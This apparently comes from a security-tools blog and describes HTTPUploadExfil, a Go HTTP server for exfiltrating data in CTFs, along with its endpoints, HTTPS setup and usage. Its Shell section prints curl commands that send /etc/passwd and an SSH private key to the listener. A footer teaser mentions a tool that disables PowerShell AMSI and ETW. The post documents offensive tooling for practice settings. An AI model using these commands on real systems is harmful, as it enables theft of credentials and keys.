Kali Linux

HTTPUploadExfil : A Simple HTTP Server For Exfiltrating Files/Data During, For Example, CTFs

HTTPUploadExfil is a (very) simple HTTP server written in Go that’s useful for getting files (and other information) off a machine using HTTP. While there are many use-cases, it’s meant to be used in low-stakes offensive scenarios (e.g., CTFs).

Think of this as python3 -m http.server but for getting data off a machine instead of on the machine.

Obviously, this is a very loud and somewhat restricted way of exfiltrating data. Nevertheless, it’s quite handy and somewhat easier than, for example, using SMB or FTP. If you are looking for something more elegant, have a look at, for example, dnsteal or PyExfil.

TL;DR

  • Build the tool using go build.
  • Run ./httpuploadexfil :1337 /home/kali/loot on your machine.
  • Access http://YOUR_IP:1337/ on the machine you need to exfiltrate data from.
  • Find your uploaded files in /home/kali/loot.

If you need HTTPs, look at the information below.

Building and Developing

While there are binaries available, it’s absolutely recommended to build this on your own. This way, you will have the newest version, and you will also know exactly what you’re running. The process is trivial:

Simply run go build within the folder, and you should get an httpuploadexfil executable for your platform.

If you make changes to the tool, remember to format using go fmt main.go.

Usage

The most common use case would be to run the server on Machine A. Now, on Machine B you access the upload form using a browser and select a file to exfiltrate. Of course, as you can see below, this can also be done using, for example, curl.

Aside from uploading files, you can also use HTTPUploadExfil to exfiltrate data using simple GET requests. If a request is sent to the \g endpoint, the whole request will be stored to disk.

Hence, you can exfiltrate data using the header of the request. It’s easiest to use GET parameters (e.g., ?data=...), but there are other options.

By default, HTTPUploadExfil will be served on port 8080. All files will be written to the current directory.

./httpuploadexfil

You can also provide some arguments:

./httpuploadexfil :1337 /home/kali/loot

The first argument is a bind address, the second one the folder to store files in.

The tool will also expose the files in the loot directory under the /l endpoint. This can be used as an easy way to bring files onto the target.

Endpoints

The webserver exposes four endpoints for you to use:

  • / (GET) is the upload form.
  • /p (POST) takes the data from the upload form. It requires a multipart/form-data request with the file field filled.
  • /g (GET) will take any GET request and store the full request on the server.
  • /l (GET) will provide access to files in the specified folder (Directory Listing). This is to provide basic python3 -m http.server functionality.

HTTPs Mode

HTTPUploadExfil can also be used in HTTPs mode. To do so, simply place a HTTPUploadExfil.csr and HTTPUploadExfil.key file next to the binary. These can be, for example, generated as follows:

openssl req -new -newkey rsa:2048 -nodes -keyout HTTPUploadExfil.key -out HTTPUploadExfil.csr
openssl x509 -req -days 365 -in HTTPUploadExfil.csr -signkey HTTPUploadExfil.key -out HTTPUploadExfil.csr

If the servers sees a HTTPUploadExfil.csr file, it will try to start in HTTPs mode. To go back to HTTP, simply remove or rename the certificate files.

Shell

Using Bash, we can exfil data using GET via, for example:

echo "data=`cat /etc/passwd`" | curl -d @- http://127.0.0.1:8080/g

Of course, we can also use curl to exfil files:

curl -F file=@/home/kali/.ssh/id_rsa http://127.0.0.1:8080/p

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

4 hours ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

4 hours ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

2 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

5 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago